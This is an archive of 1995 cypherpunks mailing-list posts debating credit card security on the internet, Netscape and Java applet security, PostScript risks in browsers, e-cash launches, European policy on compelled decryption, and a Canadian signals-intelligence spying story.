Date: Wed, 15 Nov 95 08:50:29 PST
To: Howard Melman <melman@osf.org>
Subject: Re: credit card conventional wisdom
In-Reply-To: <9511151447.AA10433@absolut.osf.org.osf.org>
Message-ID: <Pine.HPP.3.91.951115112428.20058C-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain



This may be a stupidly obvious question but..... 
We could argue until the cows come home, hell freezes over or the Cubs win
the World Series, what ever comes first ;-) about whether giving your credit
card number to a waiter or an 800 # clerk is any more or less secure than
transmitting it encrypted or clear text over a data link.

However, this misses a very large point.  The reason I will give my 
credit number to a clerk is that the bank/credit card consortium will
indemnify me against losses from fraudulent use of my card. Tearing up your
carbons is more to protect the bank than it is to protect you. The risk to
*me* is virtually zero if I am a good bank customer.  

I have seen no such statement from the Visa/MasterCard/bank consortiums
regarding who is at risk if my card number is stolen and used in cyberspace.
When I get a written indemnification from them stating clearly that 
using my credit card in cyberspace is no different from using in a local
restaurant, then I see no risk to the user in using the card in cyberspace.

The risk to the bank and merchant.......Now that is a different matter.
Credit card usage on the net will never take off until this issue is
solved to the satisfaction of the bank and the user.  Until this happens
arguing this issue is like arguing about how many angels can fit on the 
head of a pin.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."

 On Wed, 15 Nov 1995, Howard Melman wrote:

> 
> 
> On Tue Nov 14, 1995, Vladimir Z. Nuri wrote:
> 
> > attempts to get secure credit card number transfer on the
> > internet are not an end in themselves. they are the first
> > steps toward an entirely new transaction system. those who
> > see a single step and criticize it as feeble in the
> > context of past systems are missing the point and
> > apparently can't think past the present nanosecond of
> > their lives.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 15 Nov 95 09:00:13 PST
To: Simon Spero <cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
In-Reply-To: <Pine.SOL.3.91.951114203506.18220A-100000@chivalry>
Message-ID: <9511151659.AA03934@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>No. What Phil is saying is that the magnetic strip contains an extra 
>group of digits which are only available when the stripe is read, and not 
>when the card is used for CNP. 

The extra gigits I was refering to are the ones on the front of the card 
but not embossed.

Credit card data formats are avaliable in an issue of phrack. There is
also an article on credit card abuse "safe and esay carding by VaxBuster".
VaxBuster is I believe currently living in a secured community somewhere
in Texas making little ones out of big ones.l

	Phill

PS Simon is right about Blum Blum Shub, note that there is a new PRNG
avaliable called Pew, Pew, Barley, McGrew.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 15 Nov 95 20:29:08 PST
To: perry@piermont.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <30AABCD6.5E6A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Jeff Weinstein writes:
> > All of these security measures are implemented by Netscape in the
> > current release.  Specifically, Netscape Navigator 2.0beta2
> > includes all the applet security precautions detailed in the recent
> > comp.lang.java posting.  Netscape has been shipping the fixed
> > applet security model for over a month(since 2.0Beta1), and
> > Netscape and Sun continue to cooperate and work closely on applet
> > security issues.
> 
> I've got to note just one thing -- every Netscape 2.0beta2 I've used
> has been so full of bugs, and so prone to problems, that I have my
> wonders about what the security code looks like. I know, Jeff, that
> its all done by different groups -- but the Java stuff I've run in
> 2.0beta2 is so weirdly different than the supposedly compatible stuff
> I've run under HotJava -- especially when it comes to crashing (and it
> HAS crashed on me) that I have serious worries about the security of
> the thing. I'd say the quality looks very much like an alpha release,
> not "beta". I don't want to turn this to Javapunks so I won't say more
> on this topic any time soon -- its already been beaten into the
> ground.

  The version of Java in Netscape is not compatible with the version of
Java in the summer release of HotJava.  There were incompatible changes
made by Sun between their alpha(summer HotJava) and beta (Netscape 2.0
and Sun's JDK Beta).  As I understand the situation, applets that were
written for HotJava must be ported to the beta API for them to work
with more recent releases of Java.

  I would agree that Java is not as stable as the rest of the 2.0 release.
That is one reason why we have added a preference to disable Java.
If you are worried about it you can just switch it off.  I argued for
this switch because I knew that there would be people who would not
want to trust Java until it had some mileage on it.

  The early beta releases we do are mostly intended for developers and
early adopters who want early access to the new features.  We had a
great leap in quality between B1 and B2, and I expect that to continue
with the future betas.  

	--Jeff  

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 15 Nov 95 20:29:00 PST
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <v02120d05acd0346e6c23@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.951115201837.2421C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Although Private Idaho will always remain free, to encourage Ecash use, 
my Web page will support "donations."  The initial merchant list sounds 
like it's going to be a subset of this list.  Time to go add the Mark 
Twain links to the page.  This is going to be fun...

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 15 Nov 95 18:53:47 PST
To: ses@tipper.oit.unc.edu
Subject: Re: credit card conventional wisdom (fwd)
Message-ID: <01HXOR9P3BB48WY0P1@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Simon Spero <ses@tipper.oit.unc.edu>

The printed digits above the embossed account number are the first four
digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there
to discourage re-embossing of the card with another account number.
----------------------
	You may be interested in knowing that this appears to vary depending
on the card issuer (or possibly on when the card was issued). My MasterCard
(from USAA) has no such printed digits; instead, the entire account number
is on the back of the card, plus 3 (I would guess check) digits.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 16 Nov 95 09:20:45 PST
To: cypherpunks@toad.com
Subject: NID_otp
Message-ID: <199511161720.MAA17416@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-16-95. Washrag:


   "Pentagon Gaining Turf From the CIA."

      Pentagon agencies and officials are set to play a
      greater role than before in supervising key intelligence
      operations including doctoring spy satellite photos,
      and recruiting then ignoring bumbling agents overseas.
      There's even a proposal in Congress to create a new,
      national intelligence director hiding out in the Office
      of the President (OTP), and supervising nulls with
      equal job-fears at the CIA and Pentagon.

      Sen. Bob Kerrey worries about the trend because "in the
      world of the future, more and more secret garbage would
      not feed my national interest." He cited Deutch's 
proposed
      consolidation of intelligence imagery analysis in a new
      Pentagon-run advert agency, which would swallow up the 
CIA's
      National Photo Interpretation Center along with the
      Defense Department-based Central Exaggeration Office and
      Defense Entrapping Agency. "Clinton, Moynihan and Specter 

      are hogs for slop," Kerrey spat, "I want my rep 
fattened."


   NID_otp  (8 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 16 Nov 95 16:15:04 PST
To: cypherpunks@toad.com
Subject: Need to get your shop setup before friday?
Message-ID: <199511170008.QAA29573@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	If you need to get your shop setup before Friday, and don't
have the time yourself to figure out how to install the CGI things,
etc.  Community ConneXion can do it for you, at our standard CGI web
design rate. Call me at the number below, or page 510-321-1014.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 16 Nov 95 16:09:54 PST
To: rmartin@aw.sgi.com (Richard Martin)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511161831.ZM14572@glacius.alias.com>
Message-ID: <9511170006.AA17075@all.net>
MIME-Version: 1.0
Content-Type: text


> Perhaps Dr. Fred fails to realise that some people *aren't* speaking
> for their entire company every time they write e-mail. [see fc.all.net--
> i always enjoy pronouncing that nearly phonetically]

I thought all Netscape and Sun communications come from their PR
departments.  You can't have it both ways.  Your position seems to be:

	If employees make statements that work out, it's OK.
	If their statements don't work out, you disclaim them.

This is baloney.  When you work for Netscape or Sun and speak about your
company's products, you are representing the company whether you
disclaim it or not.

...
> To have some slight cpunks relevance, I will weigh in on the side of
> `It's not X's responsibility to ensure that Y's software isn't broken.'
> {for all X, Y in {software developers}} Why? For the same reason that
> I'm not generally held accountable for, say, Gary Jeffer's opinions
> or Tim May's: because I don't have any control over them.

	So your claim is that Unix is perfectly secure for networking,
because without inetd, sendmail, ident daemon, HTTP daemons, syslogd,
and all those other add-on software pieces, if your users act perfectly
and nobody ever makes a mistake, you are safe from known attacks. 

	I think this is ridiculous.

	When sendmail has a bug, most Unix systems become insecure. 
When syslog has a bug, most Unix systems become insecure.  These are
commonly called Unix insecurities.

	When Postscript allows writing to files, most Web browsers
become insecure - including Netscape, including HotJava.  If the only
commonly available postscript programs are insecure, the products have
hooks designed to allow postscript to be used automatically to interpret
programs from over the net, and servers commonly provide information in
postscript format, the enabling technology (i.e., Netscape and Hot Java)
is responsible for the vulnerability.

	If it only worked under Unix, people would call it a Unix
vulnerability, but since it works under Windows and OS/2 and every other
system that runs Netscape or HotJava, it is a Netscape and HotJava
vulnerability.

	I would also call it a postscript vulnerability, EXCEPT that
HotJava and Netscape ALSO provide hooks to command interpreters and
other insecure software, so we can't just pin it on the add-ons.  The
common thread is the Web browser, and that's where the blame belongs. 
Not with the millions of users, not with the tens of add-ons, not with
the various operating environment, but with the one common thread, the
Web browser.


-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 16 Nov 95 19:50:52 PST
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <Pine.HPP.3.91.951117024147.26779A-100000@cor.sos.sll.se>
Message-ID: <9511170350.AA29590@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>How about this:
>________________________________________________________________________
>9. Subject to legal privileges or protection, most legal systems permit
>investigating authorities to order persons to hand over objects under
>their control that are required to serve as evidence. In a parallel
>fashion, provisions should be made for the power to order persons to
>submit any specified data under their control in a computer system in the
>form required by the investigating authority.
>________________________________________________________________________

>Is this 'what we would want'? It clearly means that one can be ordered
>to reveal the password to encrypted data and punished by law if one
>refuses. Suppose they suspect you of being a child pornographer and
>get a court order to search your encrypted system. You know you are
>innocent. Is it acceptable to put you in jail for not giving them access
>to your encrypted, very personal diary (in which you describe in detail
>your sexual encounters with the wife of the Chief of Police)?

Well if you want to eliminate all search and seisure powers of the courts
then that is a valid point to make. The point of the directive though
is to point out to the legislatures that they have to consider their
position on this one.

I'm not particularly keen on the idea that we should hope that the 
legislatures let this type of change happen by default. They are not 
going to do that, they may let things slide but they then are more
likely to do something reactionary when they realise they have been
had. And that reaction is likely to be anal.


>_______________________________________________________________________
>14. Measures should be considered to minimise the negative effects of the
>use of cryptography on the investigation of criminal offenses, without
>affecting its legitimate use more than is strictly necessary.
>_______________________________________________________________________

>Is this really just a toothless statement to give to the French?

Parse it carefully, its implications depend heavily on the interpretation
of "legitimate use" and "strictly necessary". 

Point is that it is not a directive to implement a Euro-Clipper program
which is what various spin doctors were claiming. The deputy director of the
NSA tried to use it as evidence to support his claim that other countries
are following the US position.

Mind you I may be wrong about the French. Someone suggested today that
they would prefer there to be no debate on crypto because they don't
want people to find out what they are up to.


		Phill


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 16 Nov 95 20:21:33 PST
To: schampeo@imonics.com
Subject: Re: Java & Netscape security  [NOISE]
Message-ID: <9511170418.AA18604@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


><plonk>! I'm so tired of listening to this no-researching,
...

Why do people some to insist on telling the list when the killfile
someone?  Overall, isn't that just adding to the crap one has to
sift through?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 16 Nov 95 23:36:09 PST
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security (reply to misc. postings)
Message-ID: <199511170734.XAA12538@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 AM 11/16/95 -0800, Marianne Mueller wrote:

>I think it would be great if either of these two things were to magically
happen:
>
>	1) people would stop putting postscript docs on web pages
>	because it's the wrong technology for WWW - it wastes
>	bandwidth - it's hard to view & hence often ugly - everyone
>	just prints it out anyway and then complains because there
>	is no one "standard" implementation of postscript printing
>	worldwide and there are dozens of minor problems

Postscript is often a better model for applications like WWW -
certainly more flexible than GIFs, and often smaller, for pictures
that are composed of drawings or text-like objects rather than
scanned photographs.  You don't have to worry about resolution
differences, jaggies, and ugliness - just compatibility and
security and memory consumption :-).  It's somewhat the difference
between X and NeWS.  I seldom print Postscript documents out;
I view them with Ghostscript, though lack of a non-HP printer 
affects this...   Viewing java docs on line, with the equations
written as GIFs (without even an alternate text eqn or fortran form)
is much tougher.

>	2) someone could implement a secure postscript previewer
>	(whatever that means!) 
Yep.  If you've got something that limits itself to making marks
on virtual paper and modifying memory in well-defined areas,
that's probably good enough.  I'm hoping Java can do much the same job.

...
> If you have data you can't
>bear to lose, be sure to practice safe computing.  Perform backups
>regularly, and use judgement about which interpreters and executable
>programs you allow to run on your PC.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 17 Nov 95 08:58:54 PST
To: michael shiplett <walrus@ans.net>
Subject: Re: SA: Confidential Communication on the Internet
In-Reply-To: <199511171627.LAA17236@fuseki.aa.ans.net>
Message-ID: <Pine.SUN.3.90.951117105324.3208A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


No I think you did. The main point I guess was that there system acomplished
athentication, as well as privacy. But like I said lite on the technical 
side. And I agree, it spent more time talking about what it encryption,
public keys exchange, and certificates, than answering what diferent in 
their system than any of the otehr out there.

 On Fri, 17 Nov 1995, michael shiplett wrote:

>   This seemed to be a duplication of an X.509 certificate hierarchy:
> ``Hey, I don't know who you are but you have a seals which go back to
> a CA I trust.'' In this respect the information seemed unworthy of an
> article in SA.
> 
> Perhaps I did not read the article closely enough?
> 
> michael
> 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fluffy@shout.net (Chris Stillson)
Date: Fri, 17 Nov 95 09:21:33 PST
To: Wei Dai <weidai@eskimo.com>
Subject: Crypto++ port for Macintosh
Message-ID: <199511171701.LAA30608@duracef.shout.net>
MIME-Version: 1.0
Content-Type: text/plain


I have started to port your crypto++ librairied to mac, using
metrowerks.  I was just wondering if you would like a copy
of it when I finished?

All in all, a very interesting set of classes.

Chris






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 17 Nov 95 08:56:00 PST
To: Robert Hettinga <tcmay@got.net>
Subject: Re: e$: Mandarins, Lifers, and Talents
In-Reply-To: <v02120d0eacd1b471dc1d@[199.0.65.105]>
Message-ID: <Pine.BSD.3.91.951117162855.9415B-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   one point to add to the discussion of pioneers, "evangelists" and 
"prophets" in this thread:

   1.  they were all ahead of the curve --yes, they were visionaries. 
       almost all were pushed aside as it became a "business."

   2.  most were pioneers: a specific example is Bob Norris who walked
       out of a Fairchild board meeting being being rejected for his 
       eighth try at replacing Germanium because the first seven had
       failed. A couple of VCs, among them Arthur Rock and Bob Perring
       said: "...we believe you, let's try silicon..." and we have Intel.  

       But, who drives Intel today? --Grove, who is labelled as the
       founder.  Grove made the _business_ -the brains have been 
       forgotten. Norris was the darling of the VCs for a couple years
       until they figured he couldn't spot a _financial_ success.

This same scenario was repeated at Apple, and hundreds of others. Grove
was an exception to the rule that the startup management, quite often
including developers, is replaced by plain vanilla suits. Why even the
evangalistic and prophetical developers?  --because they don't deviate
from their vision to comply with the soley profit oriented modes of the
new marketeers. 

I look at it this way: our nation runs on _money_, whether we like it or 
not (I don't). Money for the sake of money is evil money as it gives 
nothing in return, particularly when everything is to be produced as 
cheaply as possible for more profit to the money folks.

Reminds of two excellent quotes from John Ruskin:

 "He who buys for price alone is this man's lawful prey."

 "The price of oats is significantly lower after processing by the horse." 

I write code because I enjoy it -even it is addictive.

	flick

-------------------------------------------------------------------------
On Thu, 16 Nov 1995, Robert Hettinga wrote:

> >It really did not happen because of cheerleaders. This is a recurring
> >belief of mine, notably in my occasional interactions with the nanotech
> >community, as a few members of this list can attest to. The "Rah, Rah"s--no
> >pun intended--play a minor role in adoption of new products and
> >technologies.
> 
> Tim, you can't tell me that there weren't people who were just plain fired
> up about the prospects for any really serious technology. Where are you
> living, the Gernsbeck Continuum? Tim, those "cheerleaders" are the ones who
> either get fired up to do something themselves, or if they can't, they get
> people either fired up to buy stuff, or fired up to build stuff. Howard
> Hughes was one. Hell, the Wright brothers were. So are you, Tim, only your
> passion is strong crypto and cryptoanarchy. Mine is this geodesic market
> stuff...
> 
> 
> >One argument I am never persuaded by is the hackerish "Feh." (Does anybody
> >but hackers use this strange word?)
> 
> Ah. Well, Tim, "Feh" is yiddish, actually. Just like "hacker" comes from
> electric trains. If you don't believe me on *that* one, ask Mr. Levy, who
> knows all about the MIT Model Railroading Club...
> 
> >In any case, I'm not interested in "doing better than that." My support for
> >Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
> >Money, or E-Purse, of Digibux, or whatever, well, I'm not a merchant. Just
> >as one could study flight, to use Bob's example, without operating a
> >passenger service or a flying school, so one can be interested in digital
> >cash without "opening an account."
> 
> Right on, Tim. Just don't rain on my parade, or anyone else who's trying to
> make something happen, for that matter.
> 
> 
> >Ah, but I never claimed otherwise (perhaps this is what you mean by "your
> >nonexistant point"). My point was only that digital cash will happen mostly
> >when it fills a need, or is accepted by customers, not by cheerleading and
> >by urging people on this list to be pioneers.
> 
> Cart before the horse, Tim. Most of the new people (say, for 2 years at
> least) on this list *are* pioneers. I've got 600 people over on www-buyinfo
> who are there primarily because 90% (!) of the traffic on it is my
> e$-filtered cross-posts from cypherpunks, and I don't know how many are
> over here because they like their whiskey neat. Those people are so fired
> up, they will find a need, or *create* one, if they have to.
> 
> >The theories about mandarins, lifers, and talents I'll discuss at another
> >time, maybe. All I'll say is that I think it's too simple a categorization.
> >Maybe it's a Boston viewpoint.
> 
> Damn Yankees. Born in El Paso, myself, by way of St. Thomas, Las Cruces,
> Corpus Christi, El Paso, Anchorage, St. Louis, Mid-MO, Chicago, and yes,
> Boston. Never knew I was one until you told me...
> 
> >The folks I've worked with over the years
> >bear almost no resemblance to any of these categories.
> 
> Typical Mandarin response. ;-). (just pulling your leg, Tim. Put the Glock
> *down*...)
> 
> >In any case, people
> >will start using digital cash if and when it fulfills some need, or some
> >need they never knew they had, gets stimulated.
> 
> Agreed.
> 
> >
> >On a personal note--which is weird, since 1000 or more people may be
> >reading this message, though most probably haven't read this far--I think
> >it best not to get too emotionally attached to some particular outcome in
> >the introduction of a new technology.
> 
> I bet they are, but I'm not attached to Mark Twain or even Digicash per se.
> It just seems to me, that if you want to get involved in this flying stuff,
> here's a plane that flies, even if its elevators are stuck on the front.
> Learn to fly now, and be able to fly the new stuff as it becomes available.
> If you want to fly, that is. Some people then couldn't help it. They *had*
> to do it. That's what's happening here, Tim.
> 
> >I've seen many "prophets" wailing to the world that their
> >visions _deserve_ success.
> 
> Not here Tim. I believe you might be projecting, or something. I just want
> to sell stuff for cash on the net. Then, I want to surfact the financial
> markets into little tiny pieces...
> 
> >The technologies which hit the right chord rarely need, or benefit from,
> >the "evangelists" and "cheerleaders." The Macintosh did not Guy Kawasaki or
> >any of the other so-called evangelists to succeed. The microprocessor did
> >not evangelists. The airplane did not. The VCR did not. The cellular phone
> >did not.
> 
> I don't believe that for a minute, and on reflection, you probably don't
> either. Jerry Sanders at AMD. Hell, Tim, you knew Moore, for god's sake.
> Think about, oh, the Sony guy, whatever his name is, Morita. The people who
> built the Mac were *possessed*. So was Kawasaki. I'm *still* possessed.
> What about the *entrepreneur's* reality distortion field. I bet you've seen
> more than a few, and probably more than a few who were right, or you
> wouldn't be thrashing your Mac on the net and clipping coupons...
> 
> 
> >And I can think immediately of several
> >technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
> >Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
>                                                                 ^^^^^
> >enthusiasts--but in which progress has been stalled or proceeded along
> ^^^^^^^^^^^^
> >different paths for different reasons.
> 
> I resemble that remark. Sure, Tim some of them didn't make it. But for
> every one of those (strange you should mention Jobs, right after I mention
> the reality distortion field, and don't count him out yet, rumor has it
> Ellison wants him to run Apple when Oracle buys it, god help us all), there
> are others who did exactly that. Von Braun, or Porsche, or, hell, all I can
> think of are germans, uh, okay, Bill Gates.
> 
> >This is a very interesting area for me, and I used to write extensively
> >about it. Nick Szabo and I had several debates about this, a couple of
> >years ago. However, no time now to discuss the full implications here.
> 
> Having been hammered by Nick myself, once or twice, I think I understand this...
> 
> So. I'm enthused. My enthusiasm is demonstrably contagious. If someone gets
> enthusiastic about all this on my account, and puts up the king-hell,
> world-beater, financial-cryptography-killer-ap that's cool by me.
> Otherwise, it's only bandwidth, which I've wasted enough on for this
> thread. If you want to make the rubble bounce, go for it.
> 
> Besides, I usually stay in my cage, these days. Which is where I'm going to
> go and lurk for another month or so...
> 
> Cheers,
> Bob Hettinga
> 
> PS: Feh
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
> "Reality is not optional." --Thomas Sowell
> The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 17 Nov 95 19:01:53 PST
To: cypherpunks@toad.com
Subject: Re: CSE gets flak on TV
Message-ID: <199511180300.TAA16642@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here (the real one) ...

On Thu, 16 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> Hmm, actually the news tape is reading a little strange here in Canada.
> Not AP, or REUTERS, but simply the Canadian Press newswire.

         [long exercise in character assassination deleted]

I think that this "writer" who felt that it was desirable to attach MY
name to this drivel deserves a good flogging. 

Clearly, someone is spending WAY to much time on //WIRES on the Dow Jones
News Retrieval Service, or wherever else they get to Canadian Press news
stories.  The matter Mr. mystery-writer detailed is in fact a Canadian
matter, a domestic affair, which has no concern to an international
audience. 

Taking three successive news stories from three days ... (press stories,
I've since pulled for my own reference) and pasting them together to
indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 

> And all these stories ... coincidentally ... broke back to back.
> 
> It's almost as though the country is disinfecting itself, or has taken 
> one particularly powerful laxative.

I don't see this at all.  The CSE story has no connection to anything 
else which is occurring domestically nor internationally.  No relationship 
whatsoever.

> But the CSE story is really, really smelly.  The worst of the whole lot. 
> 
> I think that there might be more to this than appears on the surface. 
> Maybe filling in some details might help our friends on this list.
> 
> You listening, Perry???

I think Perry has far more interesting fish to fry, than to worry about 
domestic Canadian affairs, and what occurs within another sovereign's 
borders.  

Whether or not Canada has collected and analyzed communications traffic on
the activities of foreign states, corporations, and people is simply a
Canadian matter.  

It's OUR affair.

> "And if, in fact, there has been illegal activity going on, we'll want to 
> deal with that in as public a way as possible," said Sheila Copps.
> 
> The Mexican government has presented a diplomatic note to Canada
> expressing "surprise and concern" over the report that it was spied on
> during the North American free-trade talks. 
> 
> South Korea is looking into the matter as well. 

Airing dirty laundry like this serves no purpose, whatsoever.  It's not
productive and is not focused to any particular policy objective. 

And in n any event, the Canadian Communications Security Establishment
does serve up "sloppy seconds" (as some other poster named them) under
intelligence sharing agreements with its counterparts in the United
States, Britain, Australia, and New Zealand.  

In the same vein, it also is a recipient of same.  These agreements and
working relationships have historically benefitted all. 

> And I guess ... that's all of the news that I've got to this hour.  Except
> for one brief note, that Prime Minister Chretien tried to call the States,
> but the Government shutdown meant that his call couldn't get through.  
> I think he tried to call NASA.

Fella ... whoever you are ... please get your stories straight.

The Prime Minister of Canada was trying to call NASA, not the NSA.  There IS 
a significant difference between the two, as near anyone on this list can 
attest.

The Prime Minister was attempting to contact Canadian astronaut Chris
Hadfield, who is on the space shuttle Atlantis which is presently docked
with the Russian space station Mir.  

He wasn't trying to call the NSA ...  it was the NASA. 

In fact, the Prime Minister's comments from the Commonwealth meeting in
New Zealand were most clear.  "This is an organization that works within
the law of Canada.  They do not report to me on a daily basis and I cannot
make any comments on if they are spying on anybody, I don't know.  But
they have a mandate to check a few things around the world." 

Please try reading the list for a bit, before posting and confusing
people. 

> Speaking personally, I just think that something is a bit fishy. I mean 
> "Jane Shorten" is a nym if I ever heard one ... probably married to
> "Dick Lengthen" or something.  

Your juvenile antics deserve no further comment.

> I mean ... HELLO .... GiGGle TesT ... what on earth did she think the CSE 
> did??  Made snowmen and skated on the Rideau Canal??

I don't think that this is relevant.

And btw, it's giggle test ... it's not "GiGGle TesT".  I learned how to 
use a shift key long, long ago.  You oughta try it some time.

> The agency IS obligated to destroy information about Canadians it scoops 
> up in its electronic net.  A rare exception might be a phone call 
> describing a terrorist plot, but that would truly be exceptional, I think.
> 
> I mean its not like one big fishing expedition. 

The CSE does not target its own citizens and has agreements with other 
agencies that they will not either.  If someone's communication is 
accidentally caught in the net, the CSE is obligated to destroy the 
information except in the rarest of circumstances. (i.e. foreign terrorists)

> And that's the fleshed out version of the story.

Your fleshed out story was very interesting ... especially the way you 
tied things together.  Did they teach you to do that type of thing 
somewhere??

But it's not appropriate for this list.  And this is a Canadian matter.

> I'm just sorry that our Prime Minister is in such a bad position because 
> of the timing of this "Jane Shorten's" revelations.  She also revealed 
> that Canada spied on Japan.
> 
> To think ... Canadian Prime Minister Chretien is a guest of the Japanese
> people today.  Talk about some awkward moments.  I mean, what on earth do
> you talk about?? 
> 
> George Bush and Sushi??

Cute ... really.  I'm certainly amused.  As I'm certain were all the 
Americans on this International list.  George Bush, simply had jet lag, 
when he threw up at Japan.  What does he have to do with anything?

Canada and Japan have a great deal to speak about.  Canada might even be a
good friend and help the US with the Okinawa problem.  Who knows?  We
never know how these things play. 

I really don't think that Canada will be marginalized by this, and I 
certainly hope that neither will I.  Your antics, notwithstanding, and 
your imagination of "tying things together" serves no purpose.

The people on this list can filter fact from fiction.

> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
>                                                    ...hunters...
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

Like, I said ... very, very cute.

There's only one problem, mr mystery-writer, I only have one or two
interests on this list.  And politics is not generally one of them.  My
interests are simply and in order of personal importance, 

     - removing known Security Holes in existing software or removing the
       software, (e.g.  Netscape Navigator and Java), and

     - finding some secure way to implement functional international
       commerce via the Internet. Probably, something ECU based. 

Security and E-cash. 

Your attempt to create some type of political "brownie points" or desire
to gain some attention or notoriety simply destracts me from addressing
the real issues, and addressing my backed-up email. 

MALICE DE MONSTEROUS wasn't enough for you??  

Please don't bother with any reply.  None is expected.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Fri, 17 Nov 95 18:40:08 PST
To: cypherpunks@toad.com
Subject: Re: No Privacy Right in Indonesia ? (fwd)
Message-ID: <m0tGdBP-0005JZC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



I spent several minutes resisting a followup, but if people are going to
discuss, I have to cave...

Forwarded message:
> 
> At 05:54 PM 11/17/95 -0500, "James M. Cobb" <jcobb@ahcbsd1.ovnet.com> wrote:

> >   Activists in Indonesia who use the Internet say it is a power- 
> >   ful tool for distributing information in a society where self- 
> >   censorship abounds, newspapers are tightly controlled, jour- 
> >   nalists are jailed and unlicensed magazines banned. 
> 
> The primary difference between Indonesian and Singaporean censorship
> is that the Singaporeans are a lot more urbane about it, and generally
> don't have crowds of protestors to shoot at.  Reporting on the East Timor
> activity is an especially good way to get kicked out of the country;
> I know people it's happened to.  Uncensorable communications can be
> a substantial help, though rubber-hose cryptanalysis is still fairly
> effective, and it's the type of place that would use it.
> 
> A certain amount of US activism on the East Timor problems is Internet-based;
> I don't know how connected it is to Indonesia or East Timor, which is
> too underdeveloped to be very active on the net, and has the added problem
> that activists are heavily watched.

I'll try to keep this as short as possible...

